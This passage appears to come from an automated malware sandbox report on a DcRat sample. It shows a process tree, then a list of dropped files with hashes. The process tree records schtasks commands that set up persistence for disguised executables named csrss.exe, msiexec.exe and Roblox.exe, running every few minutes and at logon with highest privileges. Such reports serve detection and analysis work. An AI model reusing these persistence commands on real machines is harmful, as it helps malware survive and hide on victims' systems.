                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\Microsoft\csrss.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:236
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\Microsoft\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:424
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\Microsoft\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:784
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:5932
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:232
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:5380
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:5156
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:3140
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4372
                                                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5700
                                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:6136
                                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5312
                                                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4060

                                                                                                                                                                    Network

                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                    Replay Monitor

                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                    Downloads

                                                                                                                                                                    • C:\Config.Msi\e57ff81.rbs

                                                                                                                                                                      Filesize

                                                                                                                                                                      1.0MB

                                                                                                                                                                      MD5

                                                                                                                                                                      dd05552a120758f0c820e08e665dbc0f

                                                                                                                                                                      SHA1

                                                                                                                                                                      a1a1389203c7edaa8a729dc8f9abd78a3086d49d

                                                                                                                                                                      SHA256

                                                                                                                                                                      9d958a26cc9e460ccc01cb540ec9f1ee150e60e63e5912ad4026f0f3eb5adf80

                                                                                                                                                                      SHA512

                                                                                                                                                                      3ee3dd544abc74fc046edffbe721dc6ece4e2c1fc78b68accdfd2ce8a351edaecd6952bb0f74aef2d71e5dedd46afee7272e6e22cf4ce5f8edfd1b4a0d8dc5ff

                                                                                                                                                                    • C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe

                                                                                                                                                                      Filesize

                                                                                                                                                                      239B

                                                                                                                                                                      MD5

                                                                                                                                                                      3492e48fb2e9fb2bfc18658e3d8f88bd

                                                                                                                                                                      SHA1

                                                                                                                                                                      34cec8222aedc8baf774aa863a041a23971c7631

                                                                                                                                                                      SHA256

                                                                                                                                                                      c0857f8c479b8fa90402a735a24b312819cdcec5c69b90bd6dafc175dbfd3b2e

                                                                                                                                                                      SHA512

                                                                                                                                                                      a9923e942d86d3e29a52d421ceb96c8cef8aae769cbb18a65e93793e444cf7712c52aaba3a5da2f06d2ee5c3eef42d6972457b13aa06a060eaf9b26369d0efc9

                                                                                                                                                                    • C:\Program Files\nodejs\node_etw_provider.man

                                                                                                                                                                      Filesize

                                                                                                                                                                      8KB

                                                                                                                                                                      MD5

                                                                                                                                                                      d3bc164e23e694c644e0b1ce3e3f9910

                                                                                                                                                                      SHA1

                                                                                                                                                                      1849f8b1326111b5d4d93febc2bafb3856e601bb

                                                                                                                                                                      SHA256

                                                                                                                                                                      1185aaa5af804c6bc6925f5202e68bb2254016509847cd382a015907440d86b4

                                                                                                                                                                      SHA512

                                                                                                                                                                      91ebff613f4c35c625bb9b450726167fb77b035666ed635acf75ca992c4846d952655a2513b4ecb8ca6f19640d57555f2a4af3538b676c3bd2ea1094c4992854

                                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\LICENSE.md

                                                                                                                                                                      Filesize

                                                                                                                                                                      818B

                                                                                                                                                                      MD5

                                                                                                                                                                      2916d8b51a5cc0a350d64389bc07aef6

                                                                                                                                                                      SHA1

                                                                                                                                                                      c9d5ac416c1dd7945651bee712dbed4d158d09e1

                                                                                                                                                                      SHA256

                                                                                                                                                                      733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

                                                                                                                                                                      SHA512

                                                                                                                                                                      508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

                                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\license

                                                                                                                                                                      Filesize

                                                                                                                                                                      1KB

                                                                                                                                                                      MD5

                                                                                                                                                                      5ad87d95c13094fa67f25442ff521efd

                                                                                                                                                                      SHA1

                                                                                                                                                                      01f1438a98e1b796e05a74131e6bb9d66c9e8542

                                                                                                                                                                      SHA256

                                                                                                                                                                      67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

                                                                                                                                                                      SHA512

                                                                                                                                                                      7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

                                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE

                                                                                                                                                                      Filesize

                                                                                                                                                                      754B

                                                                                                                                                                      MD5

                                                                                                                                                                      d2cf52aa43e18fdc87562d4c1303f46a

                                                                                                                                                                      SHA1

                                                                                                                                                                      58fb4a65fffb438630351e7cafd322579817e5e1

                                                                                                                                                                      SHA256

                                                                                                                                                                      45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

                                                                                                                                                                      SHA512

                                                                                                                                                                      54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

                                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\LICENSE.md

                                                                                                                                                                      Filesize

                                                                                                                                                                      771B

                                                                                                                                                                      MD5

                                                                                                                                                                      e9dc66f98e5f7ff720bf603fff36ebc5

                                                                                                                                                                      SHA1

                                                                                                                                                                      f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b

                                                                                                                                                                      SHA256

                                                                                                                                                                      b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79

                                                                                                                                                                      SHA512

                                                                                                                                                                      8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b

                                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\LICENSE

                                                                                                                                                                      Filesize

                                                                                                                                                                      730B

                                                                                                                                                                      MD5

                                                                                                                                                                      072ac9ab0c4667f8f876becedfe10ee0

                                                                                                                                                                      SHA1

                                                                                                                                                                      0227492dcdc7fb8de1d14f9d3421c333230cf8fe

                                                                                                                                                                      SHA256

                                                                                                                                                                      2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

                                                                                                                                                                      SHA512

                                                                                                                                                                      f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

                                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-pipeline\node_modules\minipass\package.json

                                                                                                                                                                      Filesize

                                                                                                                                                                      1KB

                                                                                                                                                                      MD5

                                                                                                                                                                      d116a360376e31950428ed26eae9ffd4

                                                                                                                                                                      SHA1

                                                                                                                                                                      192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b

                                                                                                                                                                      SHA256

                                                                                                                                                                      c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5

                                                                                                                                                                      SHA512

                                                                                                                                                                      5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

                                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE

                                                                                                                                                                      Filesize

                                                                                                                                                                      802B

                                                                                                                                                                      MD5

                                                                                                                                                                      d7c8fab641cd22d2cd30d2999cc77040

                                                                                                                                                                      SHA1

                                                                                                                                                                      d293601583b1454ad5415260e4378217d569538e

                                                                                                                                                                      SHA256

                                                                                                                                                                      04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be

                                                                                                                                                                      SHA512

                                                                                                                                                                      278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

                                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js

                                                                                                                                                                      Filesize

                                                                                                                                                                      16KB

                                                                                                                                                                      MD5

                                                                                                                                                                      bc0c0eeede037aa152345ab1f9774e92

                                                                                                                                                                      SHA1

                                                                                                                                                                      56e0f71900f0ef8294e46757ec14c0c11ed31d4e

                                                                                                                                                                      SHA256

                                                                                                                                                                      7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5

                                                                                                                                                                      SHA512

                                                                                                                                                                      5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

                                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\nopt\LICENSE

                                                                                                                                                                      Filesize

                                                                                                                                                                      780B

                                                                                                                                                                      MD5

                                                                                                                                                                      b020de8f88eacc104c21d6e6cacc636d

                                                                                                                                                                      SHA1

                                                                                                                                                                      20b35e641e3a5ea25f012e13d69fab37e3d68d6b

                                                                                                                                                                      SHA256

                                                                                                                                                                      3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706

                                                                                                                                                                      SHA512

                                                                                                                                                                      4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

                                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\promise-all-reject-late\LICENSE

                                                                                                                                                                      Filesize

                                                                                                                                                                      763B

                                                                                                                                                                      MD5

                                                                                                                                                                      7428aa9f83c500c4a434f8848ee23851

                                                                                                                                                                      SHA1

                                                                                                                                                                      166b3e1c1b7d7cb7b070108876492529f546219f

                                                                                                                                                                      SHA256

                                                                                                                                                                      1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7

                                                                                                                                                                      SHA512

                                                                                                                                                                      c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

                                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\index.d.ts

                                                                                                                                                                      Filesize

                                                                                                                                                                      4KB

                                                                                                                                                                      MD5

                                                                                                                                                                      f0bd53316e08991d94586331f9c11d97

                                                                                                                                                                      SHA1

                                                                                                                                                                      f5a7a6dc0da46c3e077764cfb3e928c4a75d383e

                                                                                                                                                                      SHA256

                                                                                                                                                                      dd3eda3596af30eda88b4c6c2156d3af6e7fa221f39c46e492c5e9fb697e2fef

                                                                                                                                                                      SHA512

                                                                                                                                                                      fd6affbaed67d09cf45478f38e92b8ca6c27650a232cbbeaff36e4f7554fb731ae44cf732378641312e98221539e3d8fabe80a7814e4f425026202de44eb5839

                                                                                                                                                                    • C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\LICENSE

                                                                                                                                                                      Filesize

                                                                                                                                                                      771B

                                                                                                                                                                      MD5

                                                                                                                                                                      1d7c74bcd1904d125f6aff37749dc069

                                                                                                                                                                      SHA1

                                                                                                                                                                      21e6dfe0fffc2f3ec97594aa261929a3ea9cf2ab

                                                                                                                                                                      SHA256

                                                                                                                                                                      24b8d53712087b867030d18f2bd6d1a72c78f9fb4dee0ce025374da25e4443b9

                                                                                                                                                                      SHA512

                                                                                                                                                                      b5ac03addd29ba82fc05eea8d8d09e0f2fa9814d0dd619c2f7b209a67d95b538c3c2ff70408641ef3704f6a14e710e56f4bf57c2bb3f8957ba164f28ee591778

                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url

                                                                                                                                                                      Filesize

                                                                                                                                                                      168B

                                                                                                                                                                      MD5

                                                                                                                                                                      db7dbbc86e432573e54dedbcc02cb4a1

                                                                                                                                                                      SHA1

                                                                                                                                                                      cff9cfb98cff2d86b35dc680b405e8036bbbda47

                                                                                                                                                                      SHA256

                                                                                                                                                                      7cf8a9c96f9016132be81fd89f9573566b7dc70244a28eb59d573c2fdba1def9

                                                                                                                                                                      SHA512

                                                                                                                                                                      8f35f2e7dac250c66b209acecab836d3ecf244857b81bacebc214f0956ec108585990f23ff3f741678e371b0bee78dd50029d0af257a3bb6ab3b43df1e39f2ec

                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.url

                                                                                                                                                                      Filesize

                                                                                                                                                                      133B

                                                                                                                                                                      MD5

                                                                                                                                                                      35b86e177ab52108bd9fed7425a9e34a

                                                                                                                                                                      SHA1

                                                                                                                                                                      76a1f47a10e3ab829f676838147875d75022c70c

                                                                                                                                                                      SHA256

                                                                                                                                                                      afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319

                                                                                                                                                                      SHA512

                                                                                                                                                                      3c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Refcrt.exe.log

                                                                                                                                                                      Filesize

                                                                                                                                                                      1KB

                                                                                                                                                                      MD5

                                                                                                                                                                      7f4734cfaf8f40dff17d92b38b4b841b

                                                                                                                                                                      SHA1

                                                                                                                                                                      105255574fa7313b6f52fc83e35a668d6980ae66

                                                                                                                                                                      SHA256

                                                                                                                                                                      20113a2492e5cfa61466e3fc0731c212cf33e47acecd1e4d883bfde3cd26d5e1

                                                                                                                                                                      SHA512

                                                                                                                                                                      6fc809ec30a3366bb81d03c9bf368eac7e241800f78b11f8dbc63070347c2f9218d8b8ea0094dfd52118406d83634fe6ed1fc6fa988d93477926e5eb81c532d6

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                      Filesize

                                                                                                                                                                      2KB

                                                                                                                                                                      MD5

                                                                                                                                                                      627073ee3ca9676911bee35548eff2b8

                                                                                                                                                                      SHA1

                                                                                                                                                                      4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                                                                                                                                      SHA256

                                                                                                                                                                      85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                                                                                                                                      SHA512

                                                                                                                                                                      3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                      Filesize

                                                                                                                                                                      152B

                                                                                                                                                                      MD5

                                                                                                                                                                      f53eb880cad5acef8c91684b1a94eed6

                                                                                                                                                                      SHA1

                                                                                                                                                                      afab2b1015fecbc986c1f4a8a6d27adff6f6fde9

                                                                                                                                                                      SHA256

                                                                                                                                                                      5cb8554e763313f3d46766ab868f9d481e3644bfc037f7b8fe43d75d87405a27

                                                                                                                                                                      SHA512

                                                                                                                                                                      d53f3965428f73c0dfed1d941a9ff06eb70b254732410b815bc759b8c7904e11292ad7e9624c12cccaed6763e7bea68208bc0b67fc70b7616d25bda143833794

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                      Filesize

                                                                                                                                                                      152B

                                                                                                                                                                      MD5

                                                                                                                                                                      b0499f1feacbab5a863b23b1440161a5

                                                                                                                                                                      SHA1

                                                                                                                                                                      37a982ece8255b9e0baadb9c596112395caf9c12

                                                                                                                                                                      SHA256

                                                                                                                                                                      41799b5bbdb95da6a57ae553b90de65b80264ca65406f11eea46bcb87a5882a7

                                                                                                                                                                      SHA512

                                                                                                                                                                      4cf9a8547a1527b1df13905c2a206a6e24e706e0bc174550caeefabfc8c1c8a40030e8958680cd7d34e815873a7a173abe40c03780b1c4c2564382f1ceed9260

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

                                                                                                                                                                      Filesize

                                                                                                                                                                      7.6MB

                                                                                                                                                                      MD5

                                                                                                                                                                      dbb820772caf0003967ef0f269fbdeb1

                                                                                                                                                                      SHA1

                                                                                                                                                                      31992bd4977a7dfeba67537a2da6c9ca64bc304c

                                                                                                                                                                      SHA256

                                                                                                                                                                      b2ac1e407ed3ecd7c7faa6de929a68fb51145662cf793c40b69eb59295bba6bc

                                                                                                                                                                      SHA512

                                                                                                                                                                      e8ac879c7198dffb78bc6ee4ad49b5de40a5a7dbbda53d427d0a034941487d13c8bb2b8d590a1fcdd81cd6abb8f21fdfcd52924eb00c45a42ee06c1e4b3d590f

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                      Filesize

                                                                                                                                                                      265B

                                                                                                                                                                      MD5

                                                                                                                                                                      f5cd008cf465804d0e6f39a8d81f9a2d

                                                                                                                                                                      SHA1

                                                                                                                                                                      6b2907356472ed4a719e5675cc08969f30adc855

                                                                                                                                                                      SHA256

                                                                                                                                                                      fcea95cc39dc6c2a925f5aed739dbedaa405ee4ce127f535fcf1c751b2b8fb5d

                                                                                                                                                                      SHA512

                                                                                                                                                                      dc97034546a4c94bdaa6f644b5cfd1e477209de9a03a5b02a360c254a406c1d647d6f90860f385e27387b35631c41f0886cb543ede9116436941b9af6cd3285d

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                      Filesize

                                                                                                                                                                      5KB

                                                                                                                                                                      MD5

                                                                                                                                                                      844bacb5ff046f2bfb34478a4f884143

                                                                                                                                                                      SHA1

                                                                                                                                                                      86082b0f9187df24362ce4d85a833297aad2d580

                                                                                                                                                                      SHA256

                                                                                                                                                                      7b44d74539bfdae90e2d0aad2294c228f318e011cfb692e259fb7200a04faa60

                                                                                                                                                                      SHA512

                                                                                                                                                                      790231adcabfe704393fcb33d9d363f3650d15c1ef15cc1edb8b96bada83bec059729bcecba53d3a8f632f6e05d5ed341e846cce012ff8bd674e937ac95045b8

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                      Filesize

                                                                                                                                                                      5KB

                                                                                                                                                                      MD5

                                                                                                                                                                      ef7c87728de2712f10aab0ee71ec46cf

                                                                                                                                                                      SHA1

                                                                                                                                                                      9448a823147794c641b6f76a47f7dea1078d9b6c

                                                                                                                                                                      SHA256

                                                                                                                                                                      a79a5a6cf648bf3c8b06ee8a313b878cb7b57235276d87d538d3fe00b8ea471e

                                                                                                                                                                      SHA512

                                                                                                                                                                      1f6e239d9bcf425f2155c5df39a9da2dcf4dc765fafefac117ed10c3a7ca4b94f1faf06e64cb7594286552202fe1ec185ca9ece936cca3edef7b0ef10314a720

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                      Filesize

                                                                                                                                                                      16B

                                                                                                                                                                      MD5

                                                                                                                                                                      46295cac801e5d4857d09837238a6394

                                                                                                                                                                      SHA1

                                                                                                                                                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                      SHA256

                                                                                                                                                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                      SHA512

                                                                                                                                                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                      Filesize

                                                                                                                                                                      16B

                                                                                                                                                                      MD5

                                                                                                                                                                      206702161f94c5cd39fadd03f4014d98

                                                                                                                                                                      SHA1

                                                                                                                                                                      bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                                                                                                      SHA256

                                                                                                                                                                      1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                                                                                                      SHA512

                                                                                                                                                                      0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                      Filesize

                                                                                                                                                                      11KB

                                                                                                                                                                      MD5

                                                                                                                                                                      3248cccfb7210bc08bc60e193571d66d

                                                                                                                                                                      SHA1

                                                                                                                                                                      c41e72fefe4cd9cee28b26c993c68346540ef733

                                                                                                                                                                      SHA256

                                                                                                                                                                      92f624d312bafce74b35e4df75a397000cd48678cc68c62d400362ca263de5c5

                                                                                                                                                                      SHA512

                                                                                                                                                                      b2e81fbfc3a78f33a24ee838d6cf531f69b47f7b0cba54c07ad8ea290b52b8e2bfd7c5c56bbccf14a6fac81a21021e0faa719e5fedbbdb1d4a8199a599e3aed5

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                      Filesize

                                                                                                                                                                      11KB

                                                                                                                                                                      MD5

                                                                                                                                                                      ab46d0edb64fd2c872001bed1365a70b

                                                                                                                                                                      SHA1

                                                                                                                                                                      8c83952542826d3d84c9d6ffbd1b564f399a2c8a

                                                                                                                                                                      SHA256

                                                                                                                                                                      972e13edda812cf06a3dc1bb04d80dd73fb96ddf416ac90fee2566a8e8c9309f

                                                                                                                                                                      SHA512

                                                                                                                                                                      1630d92f8215cbb525fc3ee05c6d787baa91434450b672a6968746691d52ab85c11fba479d2a43a527f3ad19b667a630bdb4e8c6cfe477b437e9a3ff3eae369b

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                      Filesize

                                                                                                                                                                      10KB

                                                                                                                                                                      MD5

                                                                                                                                                                      452c21c1024a3a17ca8bd8a9a15a1f4e

                                                                                                                                                                      SHA1

                                                                                                                                                                      89f6ec9dfdf1032d2ebb47d68c5e9f53a282db6c

                                                                                                                                                                      SHA256

                                                                                                                                                                      12ae6aa640bd7f14b03fca1cde93d345d25518e140a311cc826f38942027b049

                                                                                                                                                                      SHA512

                                                                                                                                                                      4dd3f73dde4c1b96adbba73da7b3438ec61bda6f13f6e2daebdebf198c5742c7438b84874d62d26a7e73b3e11721abb05c5a1a49b6f5060fba021545acef1456

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      944B

                                                                                                                                                                      MD5

                                                                                                                                                                      e3840d9bcedfe7017e49ee5d05bd1c46

                                                                                                                                                                      SHA1

                                                                                                                                                                      272620fb2605bd196df471d62db4b2d280a363c6

                                                                                                                                                                      SHA256

                                                                                                                                                                      3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f

                                                                                                                                                                      SHA512

                                                                                                                                                                      76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      944B

                                                                                                                                                                      MD5

                                                                                                                                                                      05b3cd21c1ec02f04caba773186ee8d0

                                                                                                                                                                      SHA1

                                                                                                                                                                      39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

                                                                                                                                                                      SHA256

                                                                                                                                                                      911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

                                                                                                                                                                      SHA512

                                                                                                                                                                      e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      944B

                                                                                                                                                                      MD5

                                                                                                                                                                      7d760ca2472bcb9fe9310090d91318ce

                                                                                                                                                                      SHA1

                                                                                                                                                                      cb316b8560b38ea16a17626e685d5a501cd31c4a

                                                                                                                                                                      SHA256

                                                                                                                                                                      5c362b53c4a4578d8b57c51e1eac15f7f3b2447e43e0dad5102ecd003d5b41d4

                                                                                                                                                                      SHA512

                                                                                                                                                                      141e8661d7348ebbc1f74f828df956a0c6e4cdb70f3b9d52623c9a30993bfd91da9ed7d8d284b84f173d3e6f47c876fb4a8295110895f44d97fd6cc4c5659c35

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      944B

                                                                                                                                                                      MD5

                                                                                                                                                                      f77e9123b81b0bceb1430a5ee16a1c6b

                                                                                                                                                                      SHA1

                                                                                                                                                                      39c7eaf7e2a7fa44bfe98806c9e8b5a6460c1465

                                                                                                                                                                      SHA256

                                                                                                                                                                      3075159a5cd53a7aa42b4de1f25d1baa31dae1ec182cc4528d8b9bc83a1ba661

                                                                                                                                                                      SHA512

                                                                                                                                                                      1c7c356ce84263490906445140e8bd79018ad3c5644a2a492829d692f692b87ffaee13a272e3b9a78e864b0a661cf564b2dda1dc635021db9de7b2812891cd2d

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      944B

                                                                                                                                                                      MD5

                                                                                                                                                                      ac2e231f45fc00168425cf081e4c0f5e

                                                                                                                                                                      SHA1

                                                                                                                                                                      4305c1ff4ef6687a24b21aae75a6acd49f2b39da

